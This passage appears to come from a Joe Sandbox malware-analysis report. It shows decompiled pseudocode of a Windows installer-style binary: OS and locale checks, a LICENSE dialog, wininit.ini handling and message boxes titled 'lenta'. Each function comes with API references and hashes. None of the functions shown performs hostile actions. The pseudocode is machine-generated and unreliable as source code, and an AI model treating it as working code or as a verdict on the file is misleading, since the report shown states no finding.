                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                                • String ID: UPDFILE%lu
                                                                                                                                                                                                                                                • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                                • Opcode ID: b19522553e46405fa0ec5568fae65bd49778315371112f1baec45ac5e2a053fc
                                                                                                                                                                                                                                                • Instruction ID: 59fb6b8c72cafcea450b1ba086b36cfe4907dfe0f3277d1fe746b5f8a10893ba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b19522553e46405fa0ec5568fae65bd49778315371112f1baec45ac5e2a053fc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D210571A00219ABDB149FA4DC459FFBB7CFF48710B004129F986A7681DBF59D528BE0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0010681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E0010681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t19 ^ _t44;
				_t41 =  *0x1081d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x1081d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x1081d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x101140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E001066F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x1081d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E00106CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}


















                                                                                                                                                                                                                                                0x0010681f
                                                                                                                                                                                                                                                0x0010682a
                                                                                                                                                                                                                                                0x00106831
                                                                                                                                                                                                                                                0x00106836
                                                                                                                                                                                                                                                0x0010683c
                                                                                                                                                                                                                                                0x0010683e
                                                                                                                                                                                                                                                0x00106848
                                                                                                                                                                                                                                                0x00106851
                                                                                                                                                                                                                                                0x0010685d
                                                                                                                                                                                                                                                0x00106864
                                                                                                                                                                                                                                                0x00106876
                                                                                                                                                                                                                                                0x0010693a
                                                                                                                                                                                                                                                0x0010693a
                                                                                                                                                                                                                                                0x0010687c
                                                                                                                                                                                                                                                0x0010687e
                                                                                                                                                                                                                                                0x00106885
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001068d6
                                                                                                                                                                                                                                                0x001068f4
                                                                                                                                                                                                                                                0x00106900
                                                                                                                                                                                                                                                0x00106902
                                                                                                                                                                                                                                                0x0010690a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010690c
                                                                                                                                                                                                                                                0x0010690c
                                                                                                                                                                                                                                                0x0010691c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010691e
                                                                                                                                                                                                                                                0x00106924
                                                                                                                                                                                                                                                0x0010692b
                                                                                                                                                                                                                                                0x00106932
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010692b
                                                                                                                                                                                                                                                0x0010691c
                                                                                                                                                                                                                                                0x0010690a
                                                                                                                                                                                                                                                0x00106885
                                                                                                                                                                                                                                                0x00106876
                                                                                                                                                                                                                                                0x00106951

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0010686E
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000004A), ref: 001068A7
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001068CC
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00101140,00000000,?,?,0000000C), ref: 001068F4
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00106902
                                                                                                                                                                                                                                                  • Part of subcall function 001066F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0010691A), ref: 00106741
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Control Panel\Desktop\ResourceLocale, xrefs: 001068C2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                                • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                                • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                                • Opcode ID: ea536c7de54cc7ce3d9296a87877b5851d725ce7ca1d325e25e31ae5d549018c
                                                                                                                                                                                                                                                • Instruction ID: 7a8f9a291caf0629d65d3bce7014f44bbc67259854749b4abc86b2aa452905ef
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea536c7de54cc7ce3d9296a87877b5851d725ce7ca1d325e25e31ae5d549018c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10316D31A003289FDB21DF21CC45BAAB7B8EF45768F0041A5E9C9A6580DBB09E95CF52
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00103A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memorystringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00103A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0010468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x108d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0010468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x108d4c, "<None>") == 0) {
							LocalFree( *0x108d4c);
							L9:
							 *0x109124 = 0;
							return 1;
						}
						_t9 = E00106517(_t19, 0x7d1, 0, E00103100, 0, 0);
						LocalFree( *0x108d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x109124 = 0x800704c7;
						L2:
						return 0;
					}
					E001044B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x108d4c);
					 *0x109124 = 0x80070714;
					goto L2;
				}
				E001044B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x109124 = E00106285();
				goto L2;
			}






                                                                                                                                                                                                                                                0x00103a46
                                                                                                                                                                                                                                                0x00103a57
                                                                                                                                                                                                                                                0x00103a5d
                                                                                                                                                                                                                                                0x00103a63
                                                                                                                                                                                                                                                0x00103a6a
                                                                                                                                                                                                                                                0x00103a91
                                                                                                                                                                                                                                                0x00103a9a
                                                                                                                                                                                                                                                0x00103ad8
                                                                                                                                                                                                                                                0x00103b13
                                                                                                                                                                                                                                                0x00103b19
                                                                                                                                                                                                                                                0x00103b1b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103b21
                                                                                                                                                                                                                                                0x00103ae7
                                                                                                                                                                                                                                                0x00103af4
                                                                                                                                                                                                                                                0x00103afc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103afe
                                                                                                                                                                                                                                                0x00103a87
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103a87
                                                                                                                                                                                                                                                0x00103aa8
                                                                                                                                                                                                                                                0x00103ab3
                                                                                                                                                                                                                                                0x00103ab9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103ab9
                                                                                                                                                                                                                                                0x00103a78
                                                                                                                                                                                                                                                0x00103a82
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046A0
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: SizeofResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046A9
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046C3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LoadResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046CC
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LockResource.KERNEL32(00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046D3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: memcpy_s.MSVCRT ref: 001046E5
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001046EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00102F64,?,00000002,00000000), ref: 00103A5D
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00103AB3
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                  • Part of subcall function 00106285: GetLastError.KERNEL32(00105BBC), ref: 00106285
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(<None>,00000000), ref: 00103AD0
                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00103B13
                                                                                                                                                                                                                                                  • Part of subcall function 00106517: FindResourceA.KERNEL32(00100000,000007D6,00000005), ref: 0010652A
                                                                                                                                                                                                                                                  • Part of subcall function 00106517: LoadResource.KERNEL32(00100000,00000000,?,?,00102EE8,00000000,001019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00106538
                                                                                                                                                                                                                                                  • Part of subcall function 00106517: DialogBoxIndirectParamA.USER32(00100000,00000000,00000547,001019E0,00000000), ref: 00106557
                                                                                                                                                                                                                                                  • Part of subcall function 00106517: FreeResource.KERNEL32(00000000,?,?,00102EE8,00000000,001019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00106560
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00103100,00000000,00000000), ref: 00103AF4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$LICENSE
                                                                                                                                                                                                                                                • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                                • Opcode ID: 6803a75e01a54788be1c13109dd232805d8bcce56e0f24bcbb273ed2be191051
                                                                                                                                                                                                                                                • Instruction ID: b0c414119d05fd2fed80532d7db25690f9035ea2b72ad1db938eb622f3427373
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6803a75e01a54788be1c13109dd232805d8bcce56e0f24bcbb273ed2be191051
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD11E6B0301201ABD724AF76AC19E177ABDEFE9710B10462EB6C1D69F1DFF988508760
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001024E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E001024E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0010658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00106CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}











                                                                                                                                                                                                                                                0x001024e0
                                                                                                                                                                                                                                                0x001024eb
                                                                                                                                                                                                                                                0x001024f2
                                                                                                                                                                                                                                                0x001024f7
                                                                                                                                                                                                                                                0x00102504
                                                                                                                                                                                                                                                0x0010250e
                                                                                                                                                                                                                                                0x0010251d
                                                                                                                                                                                                                                                0x0010252c
                                                                                                                                                                                                                                                0x00102541
                                                                                                                                                                                                                                                0x00102546
                                                                                                                                                                                                                                                0x00102553
                                                                                                                                                                                                                                                0x00102555
                                                                                                                                                                                                                                                0x00102555
                                                                                                                                                                                                                                                0x00102546
                                                                                                                                                                                                                                                0x0010256c

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00102506
                                                                                                                                                                                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0010252C
                                                                                                                                                                                                                                                • _lopen.KERNEL32 ref: 0010253B
                                                                                                                                                                                                                                                • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0010254C
                                                                                                                                                                                                                                                • _lclose.KERNEL32(00000000), ref: 00102555
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                                • String ID: wininit.ini
                                                                                                                                                                                                                                                • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                                • Opcode ID: 31bdabfad5f8ab67be27ccf80f510116fcfc2c50b67a4a6953e0247494aeb09a
                                                                                                                                                                                                                                                • Instruction ID: 065da04232121cae089a495f66e54087f2165473bae4914bbd74f2f7c6773d7f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31bdabfad5f8ab67be27ccf80f510116fcfc2c50b67a4a6953e0247494aeb09a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E019E326002286BD7209B659C0CEDBBB7CEF85760F400155FAC9D3194DBB48E868AA5
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001036EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E001036EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x108184 = 1;
						 *0x108180 = 1;
						L13:
						 *0x109a40 = _t119;
						L14:
						__eflags =  *0x108a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00102A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00102A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x108a38 & 0x00000001;
											if(( *0x108a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("lenta");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0010681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E001067C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E001028E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x109a40 = _t119;
						 *0x108184 = 1;
						 *0x108180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x109a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x108184 = _t135;
							 *0x108180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E001044B9(0, _t138);
					L66:
					return E00106CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}





































                                                                                                                                                                                                                                                0x001036f9
                                                                                                                                                                                                                                                0x00103700
                                                                                                                                                                                                                                                0x0010370c
                                                                                                                                                                                                                                                0x00103716
                                                                                                                                                                                                                                                0x00103718
                                                                                                                                                                                                                                                0x0010371b
                                                                                                                                                                                                                                                0x00103721
                                                                                                                                                                                                                                                0x0010372b
                                                                                                                                                                                                                                                0x0010373d
                                                                                                                                                                                                                                                0x00103745
                                                                                                                                                                                                                                                0x00103746
                                                                                                                                                                                                                                                0x00103746
                                                                                                                                                                                                                                                0x00103749
                                                                                                                                                                                                                                                0x001037ab
                                                                                                                                                                                                                                                0x001037ad
                                                                                                                                                                                                                                                0x001037ae
                                                                                                                                                                                                                                                0x001037b3
                                                                                                                                                                                                                                                0x001037b8
                                                                                                                                                                                                                                                0x001037b8
                                                                                                                                                                                                                                                0x001037bf
                                                                                                                                                                                                                                                0x001037bf
                                                                                                                                                                                                                                                0x001037c5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001037cb
                                                                                                                                                                                                                                                0x001037cd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001037d5
                                                                                                                                                                                                                                                0x001037db
                                                                                                                                                                                                                                                0x001037e8
                                                                                                                                                                                                                                                0x001037ea
                                                                                                                                                                                                                                                0x001037ea
                                                                                                                                                                                                                                                0x001037ea
                                                                                                                                                                                                                                                0x001037f0
                                                                                                                                                                                                                                                0x001037f6
                                                                                                                                                                                                                                                0x00103805
                                                                                                                                                                                                                                                0x00103817
                                                                                                                                                                                                                                                0x0010382b
                                                                                                                                                                                                                                                0x00103830
                                                                                                                                                                                                                                                0x00103836
                                                                                                                                                                                                                                                0x0010383b
                                                                                                                                                                                                                                                0x0010383d
                                                                                                                                                                                                                                                0x001038eb
                                                                                                                                                                                                                                                0x001038eb
                                                                                                                                                                                                                                                0x001038f2
                                                                                                                                                                                                                                                0x0010390c
                                                                                                                                                                                                                                                0x00103911
                                                                                                                                                                                                                                                0x00103911
                                                                                                                                                                                                                                                0x00103913
                                                                                                                                                                                                                                                0x0010394d
                                                                                                                                                                                                                                                0x0010394d
                                                                                                                                                                                                                                                0x0010394f
                                                                                                                                                                                                                                                0x001038a9
                                                                                                                                                                                                                                                0x001038a9
                                                                                                                                                                                                                                                0x001038b0
                                                                                                                                                                                                                                                0x001038b2
                                                                                                                                                                                                                                                0x001038b9
                                                                                                                                                                                                                                                0x001038bb
                                                                                                                                                                                                                                                0x001038c1
                                                                                                                                                                                                                                                0x00103975
                                                                                                                                                                                                                                                0x001038c7
                                                                                                                                                                                                                                                0x001038de
                                                                                                                                                                                                                                                0x001038e0
                                                                                                                                                                                                                                                0x001038e0
                                                                                                                                                                                                                                                0x0010397b
                                                                                                                                                                                                                                                0x0010397d
                                                                                                                                                                                                                                                0x001039a9
                                                                                                                                                                                                                                                0x0010397f
                                                                                                                                                                                                                                                0x00103982
                                                                                                                                                                                                                                                0x0010398b
                                                                                                                                                                                                                                                0x0010398d
                                                                                                                                                                                                                                                0x0010398f
                                                                                                                                                                                                                                                0x0010399f
                                                                                                                                                                                                                                                0x001039a1
                                                                                                                                                                                                                                                0x00103991
                                                                                                                                                                                                                                                0x00103991
                                                                                                                                                                                                                                                0x00103991
                                                                                                                                                                                                                                                0x0010398f
                                                                                                                                                                                                                                                0x001039af
                                                                                                                                                                                                                                                0x001039b6
                                                                                                                                                                                                                                                0x00103a0f
                                                                                                                                                                                                                                                0x00103a0f
                                                                                                                                                                                                                                                0x00103a11
                                                                                                                                                                                                                                                0x00103a13
